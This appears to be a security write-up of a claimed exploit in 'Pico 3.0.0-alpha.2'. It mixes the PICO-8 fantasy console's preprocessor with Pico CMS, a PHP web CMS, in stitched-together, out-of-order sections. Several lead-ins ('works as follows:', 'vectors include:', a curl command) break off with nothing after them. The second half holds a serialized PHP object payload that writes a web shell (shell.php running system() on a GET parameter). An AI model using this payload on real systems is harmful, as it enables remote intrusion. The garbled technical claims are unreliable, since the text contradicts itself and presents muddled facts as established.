
3.0.0-alpha.2 Exploit: Pico


This write-up describes a preprocessor bypass exploit identified in Pico 3.0.0-alpha.2, specifically within the context of the PICO-8 fantasy console's scripting environment.

Vulnerability Overview

The vulnerability resides in the PICO-8 preprocessor, which handles syntax extensions (like +=, shorthand if, and ?). Due to how the preprocessor handles multiline strings, an attacker can craft code that "escapes" a string after the preprocessing phase, allowing for arbitrary code execution while significantly reducing token costs for the script.

Vulnerability Type: Preprocessor Bypass / Logic Flaw
Affected Version: Pico 3.0.0-alpha.2
Impact: Arbitrary code execution and token limit bypass.

Exploit Mechanism

The exploit leverages a discrepancy in how the preprocessor treats multiline strings compared to how the final Lua interpreter executes them.

Initial State (Pre-Patch): The malicious code is placed inside a multiline string. To the preprocessor, this counts as a single token.

The Flaw: The preprocessor is "non-syntax-aware." By using specific character sequences, the attacker tricks the preprocessor into terminating the string early or failing to recognize it as a string during its "patching" phase.

Final State (Post-Patch): After the preprocessor finishes its pass, the code that was supposedly inside a string is now treated as regular, executable code by the PICO-8 engine.

Proof of Concept (PoC): Pico 3.0.0-alpha.2 Exploit

According to community research on Google Groups, the exploit allows running any code that fits on one line and avoids specific PICO-8 shorthand (like += or ?).

Token Cost: Only 8 tokens (vs. the hundreds a complex script might usually cost).

Sample Trigger:

-- The preprocessor sees a string, but the patched version executes:
[=[ exploit_code_here ]=]

(Note: The exact character sequence depends on the specific preprocessor "weirdness" mentioned in the alpha.2 release notes.)

Impact & Remediation

Security Risk: In a shared environment (like a BBS or education platform), this could lead to unintended script behavior or "impossible" cartridges that exceed standard hardware limits.

Status: Development of the original Pico project has largely ceased. While Pico 3.0.0-alpha.2 was released as a fix for certain fatal errors (such as unparenthesized #608), it introduced or retained these preprocessor quirks.

Recommendation: Users are advised to migrate to more actively maintained flat-file systems or engines like Grav CMS or HTMLy if using Pico as a web CMS. For PICO-8 developers, avoid using unofficial alpha builds for production cartridges.


To understand how this exploit evolved, review the timeline:

A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.

!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"

Once shell.php is written, the attacker has permanent access.

The first step for an attacker is confirming the alpha version. Pico 3.0.0-alpha.2 exposes a distinct header and a debug route:

Once confirmed, the attacker probes for the Twig sandbox misconfiguration.

The vulnerability exists in the Pico::getPageData() method. In versions prior to 3.0.0, user input was sanitized strictly. However, in 3.0.0-alpha.2, the developers introduced a performance optimization that caches compiled Twig templates based on file modification times.

The exploit works as follows:

Pico CMS (stable) has a good track record of flat-file security, but alpha versions are outside that guarantee. The project’s SECURITY.md file (if present) outlines reporting procedures. Historically, the maintainers respond to responsible disclosures but focus on stable releases.

As of this writing, Pico 3.0.0-alpha.2 has not received an official CVE ID, primarily because the Pico CMS team explicitly warns that alpha versions are "not for production use." However, security researchers have cataloged the exploit under third-party advisories.

The primary attack vectors identified in this version include:

The most dangerous exploit chains the first two vulnerabilities together, achieving Remote Code Execution (RCE) without authentication.

Warning: The following is for educational and defensive purposes only.

An attacker can trigger the exploit with a single curl command. The goal is to inject a PHP web shell into the Twig cache file.
